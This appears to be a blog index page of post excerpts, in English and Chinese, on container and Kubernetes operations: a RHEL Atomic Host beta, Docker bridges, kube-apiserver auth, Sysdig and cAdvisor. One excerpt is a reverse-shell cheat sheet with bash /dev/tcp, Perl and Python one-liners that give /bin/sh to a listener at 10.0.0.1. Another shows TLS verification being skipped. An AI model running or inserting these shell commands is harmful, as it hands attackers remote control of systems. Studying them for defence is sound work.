Red Hat has announced first public beta of Red Hat Enterprise Linux 7 Atomic Host. The beta is available from Red Hat and on Amazon Web Services and Google Compute Platform.
What can you expect from the Red Hat Enterprise Linux 7 Atomic Host Beta?
Red Hat Enterprise Linux 7 Atomic Host Beta provides a streamlined host platform that is optimized to run application containers. The software components included in Red Hat Enterprise Linux 7 Atomic Host Beta, as well as the default system tunings, have been designed to enhance the performance, scalability and security of containers, giving you the optimal platform on which to deploy and run application containers.
... ➦nc -l -p 8080 -vvv
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL revere shell here.
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
... ➦首先修改Docker的默认网桥:
#停止Docker Daemon进程
systemctl stop docker
#设置默认网桥docker0为down,并删除
ip link set dev docker0 down
brctl delbr docker0
#新建Linux网桥localbr0
brctl addbr localbr0
#在每台主机上更改10.10.x.0/24,注意各台主机之间不要重复
ip addr add 10.10.2.1/24 dev localbr0
ip link set dev localbr0 up
echo 'OPTIONS="--bridge localbr0 --iptables=false"'>>/etc/sysconfig/docker
systemctl start Docker
为上述网桥添加GRE连接
... ➦You can enable kubernetes authentication by through this documentation. Then you happily access kube-apiserve by curl:
# curl -k -N -X GET -H "Authorization: Basic XXXXXXXXXX" http://localhost:8080/api/v1/namespaces/default/pods
{
"kind": "PodList",
"apiVersion": "v1",
"metadata": {
"selfLink": "/api/v1/namespaces/default/pods",
"resourceVersion": "74034"
},
"items": []
}
Nothing blocks this request! What is wrong? Wait a moment and checkout kubernetes documentation, I find this:
... ➦The Kubernetes API is served by the Kubernetes apiserver process. Typically, there is one of these running on a single kubernetes-master node.
Neutron里面的Floating IPs目前是基于iptables NAT来实现的,它使用ip_conntrack来跟踪所有连接(五元组),而ip_conntrack会大大降低NAT的性能,并且也有一些安全问题(比如conntrack未释放问题)。从Floating IPs的作用来看,它只需要完成源目的IP地址的转换即可,完全可以不需要conntrack,因而就有了一个Stateless Floating IPs的BP,
... ➦Sysdig captures system calls and other system level events using a linux kernel facility called tracepoints, providing a rich set of real-time, system-level information.
Sysdig “packetizes” this information, so that you can do things like save it into trace files and easily filter it, a bit like you would do with tcpdump. This makes it very flexible to explore what processes are doing.
Sysdig instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events. Then, using sysdig’s command line interface, you can filter and decode these events in order to extract useful information. Sysdig can be used to inspect systems live in real-time, or to generate trace files that can be analyzed at a later stage.
... ➦终于耐不住要升级下kernel了,目前epel提供两个版本: kernel-lt (4.4)和kernel-ml (4.5):
升级到lt的步骤很简单:
... ➦kubectl
is the main tool to interact with Kubernetes cluster. It connects to http://localhost:8080
with no auth by default. But how can we use kubectl
with auth?
Pretty simple, just config kubectl
with dedicated cluster:
kubectl config set-credentials default --username=username --password=password
kubectl config set-cluster default --server=https://kubernetes-master:6443 --insecure-skip-tls-verify=true
kubectl config set-context default --cluster=default --user=default
kubectl config use-context default
cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers. Specifically, for each container it keeps resource isolation parameters, historical resource usage, histograms of complete historical resource usage and network statistics. This data is exported by container and machine-wide.
cAdvisor has native support for Docker containers and should support just about any other container type out of the box. We strive for support accross the board so feel free to open an issue if that is not the case. cAdvisor’s container abstraction is based on lmctfy’s so containers are inherently nested hierarchically.
... ➦